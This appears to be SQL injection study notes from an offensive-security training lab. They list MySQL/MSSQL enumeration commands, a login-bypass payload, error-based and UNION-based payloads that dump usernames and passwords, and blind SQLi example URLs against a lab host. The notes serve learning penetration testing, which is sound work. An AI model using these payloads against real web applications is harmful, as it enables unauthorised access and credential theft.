Published on March 24, 2025
# Connect to MySQL
mysql -u root -p'root' -h <host> -P 3306
# Version & current user
SELECT version();
SELECT system_user();
# Databases and stored password hashes
SHOW DATABASES;
SELECT user, authentication_string FROM mysql.user WHERE user='offsec';
# Connect to MSSQL via Impacket (the commands below target MSSQL, not MySQL)
impacket-mssqlclient <user>:<pass>@<host> -windows-auth
# Version & DB details
SELECT @@version;
SELECT name FROM sys.databases;
# Tables and data
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM offsec.dbo.users;
# Bypass login
offsec' OR 1=1 -- //
# Extract version
' or 1=1 in (select @@version) -- //
# Dump all users
' OR 1=1 in (SELECT * FROM users) -- //
# Get only passwords
' or 1=1 in (SELECT password FROM users) -- //
# Get admin password
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //
# UNION appends the rows of a second SELECT to the original query's result set
UNION
# Conditions for UNION SQLi
1. The injected SELECT must return the same number of columns as the original query
2. Each column's data type must be compatible with the corresponding column of the original query
# Determine the column count via ORDER BY
' ORDER BY 1-- //
# Check which of the 5 columns are rendered in the response
%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //
# Enumerate DB info
%' UNION SELECT database(), user(), @@version, null, null -- //
# Use NULL in columns of unknown type to avoid string/integer type mismatches
' UNION SELECT null, null, database(), user(), @@version -- //
# List tables & columns
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# Dump user data
' UNION SELECT null, username, password, description, null FROM users -- //
# What is Blind SQLi?
Exploiting SQL injection when the query output is not returned in the response; the result is inferred from the application's behaviour instead.
# Types:
1. Boolean-based (inferred from a true/false difference in the response)
2. Time-based (inferred from an induced delay in the response)
# Boolean example:
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //
# Time-based example (MySQL sleep()):
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //